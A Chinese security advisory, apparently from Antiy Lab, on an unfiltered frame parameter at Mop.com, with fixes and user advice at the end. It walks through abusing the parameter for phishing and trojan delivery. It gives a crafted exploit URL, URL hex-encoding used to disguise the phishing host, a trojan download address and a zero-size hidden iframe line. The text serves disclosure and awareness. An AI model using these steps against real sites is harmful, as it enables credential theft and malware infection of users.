标签:
挂马猫扑this跨站mop中国安天安天实验室it |
如今的黑色产业链,在中国已发展到了巅峰的时代。不法份子通过各种渠道盗取用户个人信息,本文所叙的 ”挂马” ”钓鱼” 也正是产业链中不可缺少的一部分,通过挖掘漏洞,购买肉鸡、销售一条龙的渠道,每年的产值达到了上亿人民币。而最终受害的是广大网民的利益。
猫扑网主要以年轻人为主,以ALEXA全球网站排名第111位,每天不计上千万的访问量,成为了中国第一大娱乐社区。
很多人都是在不知不觉中就将自己的个人信息,以及帐号密码泄露了出去。但最终都不知道是怎么丢的,网页钓鱼正是其中的一个手段,通过伪造一个类似官方的网站要求用户输入帐号,或个人信息,输入之后一但提交,你的帐号密码就会写入钓鱼者的数据库中,但这时候你的电脑并没有中木马。
或有时候陌生人给你发来一个消息 例如 您已被猫扑社区抽中一等奖,请联系猫扑官方网站,网址如图
原理部分
其实我们的方法并不是向论坛里面发帖,我们利用的正是猫扑网存在的外部网址未过滤导致的跨站漏洞 (Cross Site Script)。下面我们来分析一下这种跨站漏洞的链接地址。
http://dzh2.mop.com/ladyClub/indexframe.jsp?url=http://xingqibar.cn
这个链接是一个含参数的链接,其中“?url=”后面的地址就是作为一个参数,当用户访问这个网址的时候,indexframe.jsp会获取url=后面的地址,并且把这个地址也就是http://xingqibar.cn框架到当前网页中,并且在特定位置显示出来。
很显然,这是网页设计者在编写这个页面的时候忽略了对url=后面的参数进行过滤,这就如同一个公司虽然安装了大门,却忘记了给门安装门锁一样,其结果是由于没有钥匙的鉴别条件,每个人都能够混入这个公司,冒充公司内部的人员。
通常正常的流程应该是,先获取url=后面的地址,之后判断这个地址是否合法,也就是这个url=后面的连接是否是网站内部的地址,这个可以通过js脚本判断网址域名前面的字符来确定网址是否合法,比如,dzh2.mop.com,通过判断.com前面的字符是否是mop,如果是内部合法地址就将其在页面中显示,外部非法网址就不在页面中显示。这样黑客就没有了可乘之机。几乎所有的给用户造成伤害的网络安全大问题都出在了对一个小小的细节的疏忽上。
钓鱼攻击
黑客是怎么做的呢?如果有一个人给你在QQ或者Email中发送了一个链接地址,然后告知你有新的短消息或者中奖了,你会怎么办?对于多数用户链接地址肯定是识别的第一身份要素,而且常用的QQ都包含有链接识别,但是链接就那么可靠吗?
“http://dzh2.mop.com/ladyClub/indexframe.jsp?url=http://xingqibar.cn”这段链接地址不仅在看起来是来自猫扑,而且连QQ都会认为这是经过认证的安全链接地址,这时你是否就放心的认为它是安全的了呢?
当你的第一道心理防线瓦解之后,当你点击这个链接地址之后,你接下来会进入到这样的一个页面。它是不是与你见到的猫扑网站一样?你会怎么判断这就是猫扑网站吗?!
如果此时你完全信任了这个来自看似猫扑的消息通知或者中奖链接地址,然后输入自己在猫扑的用户名和密码,那么你的一切就会被黑客所截获。怎么可能呢?不用疑惑,其实这就是通过我们前面所说跨站漏洞所实现的,这个大段的网址实际上是一个半真半假的网页,一部分是猫扑的真实页面,但是另外一部分页面却是来自http://xingqibar.cn这个黑客的钓鱼网站。
第一步:黑客制作这样的远着上钩的钓鱼网站非常简单,首先黑客会用Dreamweaver或者Microsoft Expression Web制作一个钓鱼页面,在这个钓鱼页面中使用Request这样在ASP中非常简单的输出函数就可以实现保存在钓鱼页面中输入用户名密码等信息目的。
第二步:钓鱼页面制作好后,黑客会将页面上传到自己的网站中,例如我们前面提到的http://xingqibar.cn这样的网址。然后将这个钓鱼页面的链接地址,添加到http://dzh2.mop.com/ladyClub/indexframe.jsp?url=的 “=”等于号后面即可,这样一个迷惑性的钓鱼页面就做成了。
第三步:高明的黑客此时还会再加一个伪装的步骤,他们会加密“=”等于号后面的钓鱼页面的地址,让这个网址看起来更加真实。加密手段通过URL16进制加密即可实现。黑客可以通过登陆http://tool.chinaz.com/这个网址,在网页中找到“代码转换工具”一项,然后点击选择下拉菜单中的“URL16进制加密”一项,之后将钓鱼网页链接地址输入到要加密的地址栏中,例如“http://blog.sina.com.cn/deyumiao ”加密后为“http://%62%6C%6F%67%2E%73%69%6E%61%2E%63%6F%6D%2E%63%6E/deyumiao ”。
此时黑客再将猫扑和钓鱼网站的地址连接到一起,就成为了“http://dzh2.mop.com/ladyClub/indexframe.jsp?url= http://%62%6C%6F%67%2E%73%69%6E%61%2E%63%6F%6D%2E%63%6E/deyumiao”
这样的网站想必多数普通用户都不会知道是黑客伪装的结果。
安全小百科:16进制加密是将url中的单个字符转换成16进制,之后每个转换后的双位16进制前面加上%再连在一起就是加密后的地址了。以加密baidu.com为例,baidu.com加密后就是%62%61%69%64%75%2E%63%6F%6D(图)。
挂马攻击
除了伪装钓鱼网页之外,这个跨站漏洞还可以被黑客用作挂马攻击,挂马的关键就是制作挂马网页。
第一步:黑客在挂马之前先就要准备网页木马,他们通常会使用网页木马生成器,例如在例子中我们使用的MS09-002网页木马生成器。
在打开这款生成器后,首先在“木马下载地址”输入配置并上传好的特洛伊木马地址,例如http://xinbqibar.cn/1.exe(图),然后点击“声称”按钮,此时生成器会生成一个HTML网页,也就是黑客使用的挂马网页。
第二步:将挂马网页同样上传到自己的钓鱼空间中,并复制上传后的网页木马链接地址,然后用记事本打开刚才的钓鱼页面,在钓鱼页面的HTML代码后面输入IFRAME框架挂马代码
<iframe src=http://网页木马链接地址 width=0 height=0></iframe>
安全小百科:Iframe是html语言中的框架标签,而html语言中都是以一对< iframe >出现的,代码结束的时候则需要多出一个斜杠 / 表示代码结束。而代码中的width是框架的宽度为0,Height高度也为0,也就代表这个iframe框架既没有高度也没有宽度,那么这个框架就隐藏了。
第三步:然后故技重施,将这个页面上传到钓鱼空间中,再将这个页面地址经过URL16进制加密后添加到“URL=”号之后,这样一个既能够挂马,又能够钓鱼的黑客页面就制作完成了。
黑客会将这样的页面通过QQ群发等方式广为传播,对于那些缺乏防挂马软件的用户而言,不是中马就是被钓鱼,而且这一切都是伪装在网友们都极其信任并且极其有人气的猫扑网站之下,那些不设防的用户极少能够逃过这样的连环套。
漏洞修补之法
对猫扑而言,要加强网站的安全性检测,特别是要增加对外部链接地址的过滤,对url=后面的外部链接参数过滤要在所有页面进行,不能遗漏一个。
对普通用户而言,要避免被这个漏洞祸害,要有这样的信念,天下没有免费的午餐。例如你在猫扑什么也没做,突然通知你中了一个大奖,这种基本上是没有可能的。大家最好不要相信网络中奖,十之八九都是假的。
如何你看到一个网址后面有大量的加密,就要多一个心眼,最好启动带有网页木马拦截功能的安全辅助工具,再打开网页,避免网页木马的骚扰。此外,大家还要勤打补丁,及时升级杀毒软件病毒库。
(安天实验室)